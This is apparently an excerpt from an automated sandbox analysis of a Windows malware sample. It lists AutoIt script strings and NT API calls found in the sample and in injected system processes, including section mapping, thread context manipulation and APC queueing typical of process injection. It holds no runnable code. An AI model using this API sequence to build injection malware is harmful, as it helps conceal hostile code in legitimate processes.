Source: LisectAVT_2403002B_466.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_eed93408-4

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040B003 NtCreateSection,	2_2_0040B003
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040A9D3 NtSetContextThread,	2_2_0040A9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040B223 NtMapViewOfSection,	2_2_0040B223
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040BAF3 NtDelayExecution,	2_2_0040BAF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040ABE3 NtResumeThread,	2_2_0040ABE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040B453 NtCreateFile,	2_2_0040B453
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C4B3 NtClose,	2_2_0042C4B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040A5B3 NtSuspendThread,	2_2_0040A5B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040B683 NtReadFile,	2_2_0040B683
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040BF13 NtAllocateVirtualMemory,	2_2_0040BF13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040A7C3 NtGetContextThread,	2_2_0040A7C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B60 NtClose,LdrInitializeThunk,	2_2_03272B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03272DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk,	2_2_032735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274340 NtSetContextThread,	2_2_03274340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274650 NtSuspendThread,	2_2_03274650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BA0 NtEnumerateValueKey,	2_2_03272BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B80 NtQueryInformationFile,	2_2_03272B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BE0 NtQueryValueKey,	2_2_03272BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BF0 NtAllocateVirtualMemory,	2_2_03272BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AB0 NtWaitForSingleObject,	2_2_03272AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AF0 NtWriteFile,	2_2_03272AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AD0 NtReadFile,	2_2_03272AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F30 NtCreateSection,	2_2_03272F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F60 NtCreateProcessEx,	2_2_03272F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FA0 NtQuerySection,	2_2_03272FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FB0 NtResumeThread,	2_2_03272FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F90 NtProtectVirtualMemory,	2_2_03272F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FE0 NtCreateFile,	2_2_03272FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E30 NtWriteVirtualMemory,	2_2_03272E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EA0 NtAdjustPrivilegesToken,	2_2_03272EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E80 NtReadVirtualMemory,	2_2_03272E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EE0 NtQueueApcThread,	2_2_03272EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D30 NtUnmapViewOfSection,	2_2_03272D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D00 NtSetInformationFile,	2_2_03272D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D10 NtMapViewOfSection,	2_2_03272D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DB0 NtEnumerateKey,	2_2_03272DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DD0 NtDelayExecution,	2_2_03272DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C00 NtQueryInformationProcess,	2_2_03272C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C60 NtCreateKey,	2_2_03272C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C70 NtFreeVirtualMemory,	2_2_03272C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CA0 NtQueryInformationToken,	2_2_03272CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CF0 NtOpenProcess,	2_2_03272CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CC0 NtQueryVirtualMemory,	2_2_03272CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273010 NtOpenDirectoryObject,	2_2_03273010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273090 NtSetValueKey,	2_2_03273090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032739B0 NtGetContextThread,	2_2_032739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273D10 NtOpenProcessToken,	2_2_03273D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273D70 NtOpenThread,	2_2_03273D70
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE4650 NtSuspendThread,LdrInitializeThunk,	4_2_04CE4650
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE4340 NtSetContextThread,LdrInitializeThunk,	4_2_04CE4340
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_04CE2CA0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2C60 NtCreateKey,LdrInitializeThunk,	4_2_04CE2C60
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_04CE2C70
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2DD0 NtDelayExecution,LdrInitializeThunk,	4_2_04CE2DD0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_04CE2DF0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_04CE2D10
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_04CE2D30
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_04CE2EE0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_04CE2E80
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2FE0 NtCreateFile,LdrInitializeThunk,	4_2_04CE2FE0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2FB0 NtResumeThread,LdrInitializeThunk,	4_2_04CE2FB0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2F30 NtCreateSection,LdrInitializeThunk,	4_2_04CE2F30
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2AD0 NtReadFile,LdrInitializeThunk,	4_2_04CE2AD0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2AF0 NtWriteFile,LdrInitializeThunk,	4_2_04CE2AF0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_04CE2BE0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_04CE2BF0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_04CE2BA0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2B60 NtClose,LdrInitializeThunk,	4_2_04CE2B60
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE35C0 NtCreateMutant,LdrInitializeThunk,	4_2_04CE35C0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE39B0 NtGetContextThread,LdrInitializeThunk,	4_2_04CE39B0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2CC0 NtQueryVirtualMemory,	4_2_04CE2CC0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2CF0 NtOpenProcess,	4_2_04CE2CF0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2C00 NtQueryInformationProcess,	4_2_04CE2C00
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2DB0 NtEnumerateKey,	4_2_04CE2DB0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2D00 NtSetInformationFile,	4_2_04CE2D00
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2EA0 NtAdjustPrivilegesToken,	4_2_04CE2EA0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2E30 NtWriteVirtualMemory,	4_2_04CE2E30
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2F90 NtProtectVirtualMemory,	4_2_04CE2F90
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2FA0 NtQuerySection,	4_2_04CE2FA0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2F60 NtCreateProcessEx,	4_2_04CE2F60
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2AB0 NtWaitForSingleObject,	4_2_04CE2AB0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE2B80 NtQueryInformationFile,	4_2_04CE2B80
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE3090 NtSetValueKey,	4_2_04CE3090
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE3010 NtOpenDirectoryObject,	4_2_04CE3010
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE3D70 NtOpenThread,	4_2_04CE3D70
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CE3D10 NtOpenProcessToken,	4_2_04CE3D10
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B28C00 NtCreateFile,	4_2_00B28C00
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B28DF0 NtDeleteFile,	4_2_00B28DF0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B28D30 NtReadFile,	4_2_00B28D30
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B28E70 NtClose,	4_2_00B28E70
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_00B28FB0 NtAllocateVirtualMemory,	4_2_00B28FB0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04B3C75B NtQueryInformationProcess,	4_2_04B3C75B

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E840B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_00E840B1

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E78858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00E78858

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E8545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00E8545F

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E2E800	0_2_00E2E800
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E4DBB5	0_2_00E4DBB5
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E2E060	0_2_00E2E060
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00EA804A	0_2_00EA804A
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E34140	0_2_00E34140
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E42405	0_2_00E42405
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E56522	0_2_00E56522
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00EA0665	0_2_00EA0665
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E5267E	0_2_00E5267E
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E36843	0_2_00E36843
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E4283A	0_2_00E4283A
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E589DF	0_2_00E589DF
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00EA0AE2	0_2_00EA0AE2
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E56A94	0_2_00E56A94
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E38A0E	0_2_00E38A0E
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E7EB07	0_2_00E7EB07
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E88B13	0_2_00E88B13
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E4CD61	0_2_00E4CD61
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E57006	0_2_00E57006
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E33190	0_2_00E33190
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E3710E	0_2_00E3710E
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E21287	0_2_00E21287
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E433C7	0_2_00E433C7
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E4F419	0_2_00E4F419
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E416C4	0_2_00E416C4
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E35680	0_2_00E35680
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E358C0	0_2_00E358C0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E478D3	0_2_00E478D3
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E41BB8	0_2_00E41BB8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E59D05	0_2_00E59D05
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E2FE40	0_2_00E2FE40
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E4BFE6	0_2_00E4BFE6
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_00E41FD0	0_2_00E41FD0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: 0_2_019137A0	0_2_019137A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004180D3	2_2_004180D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004118EC	2_2_004118EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004118F3	2_2_004118F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042E883	2_2_0042E883
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040109C	2_2_0040109C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004010A0	2_2_004010A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411B13	2_2_00411B13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004033C0	2_2_004033C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FB93	2_2_0040FB93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004033B7	2_2_004033B7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402765	2_2_00402765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402770	2_2_00402770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402F2D	2_2_00402F2D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402F30	2_2_00402F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004027A9	2_2_004027A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA352	2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033003E6	2_2_033003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C02C0	2_2_032C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230100	2_2_03230100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C8158	2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F41A2	2_2_032F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033001AA	2_2_033001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F81CC	2_2_032F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264750	2_2_03264750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C7C0	2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325C6E0	2_2_0325C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03300591	2_2_03300591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4420	2_2_032E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F2446	2_2_032F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EE4F6	2_2_032EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FAB40	2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F6BD7	2_2_032F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330A9A6	2_2_0330A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324A840	2_2_0324A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03242840	2_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032268B8	2_2_032268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E8F0	2_2_0326E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03282F28	2_2_03282F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260F30	2_2_03260F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E2F30	2_2_032E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4F40	2_2_032B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BEFA0	2_2_032BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324CFE0	2_2_0324CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232FC8	2_2_03232FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEE26	2_2_032FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240E59	2_2_03240E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252E90	2_2_03252E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FCE93	2_2_032FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEEDB	2_2_032FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324AD00	2_2_0324AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DCD1F	2_2_032DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03258DBF	2_2_03258DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323ADE0	2_2_0323ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240C00	2_2_03240C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0CB5	2_2_032E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230CF2	2_2_03230CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F132D	2_2_032F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322D34C	2_2_0322D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0328739A	2_2_0328739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032452A0	2_2_032452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E12ED	2_2_032E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B2C0	2_2_0325B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327516C	2_2_0327516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F172	2_2_0322F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330B16B	2_2_0330B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324B1B0	2_2_0324B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F70E9	2_2_032F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF0E0	2_2_032FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF0CC	2_2_032EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032470C0	2_2_032470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF7B0	2_2_032FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F16CC	2_2_032F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7571	2_2_032F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DD5B0	2_2_032DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF43F	2_2_032FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231460	2_2_03231460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFB76	2_2_032FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FB80	2_2_0325FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B5BF0	2_2_032B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327DBF9	2_2_0327DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B3A6C	2_2_032B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFA49	2_2_032FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7A46	2_2_032F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DDAAC	2_2_032DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03285AA0	2_2_03285AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E1AA3	2_2_032E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EDAC6	2_2_032EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D5910	2_2_032D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249950	2_2_03249950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B950	2_2_0325B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AD800	2_2_032AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032438E0	2_2_032438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFF09	2_2_032FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFFB1	2_2_032FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03241F92	2_2_03241F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03203FD2	2_2_03203FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03203FD5	2_2_03203FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249EB0	2_2_03249EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7D73	2_2_032F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03243D40	2_2_03243D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F1D5A	2_2_032F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FDC0	2_2_0325FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B9C32	2_2_032B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFCF2	2_2_032FFCF2
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D5E4F6	4_2_04D5E4F6
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D62446	4_2_04D62446
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D54420	4_2_04D54420
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D70591	4_2_04D70591
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CB0535	4_2_04CB0535
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CCC6E0	4_2_04CCC6E0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CAC7C0	4_2_04CAC7C0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CD4750	4_2_04CD4750
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04CB0770	4_2_04CB0770
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D42000	4_2_04D42000
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 4_2_04D681CC	4_2_04D681CC
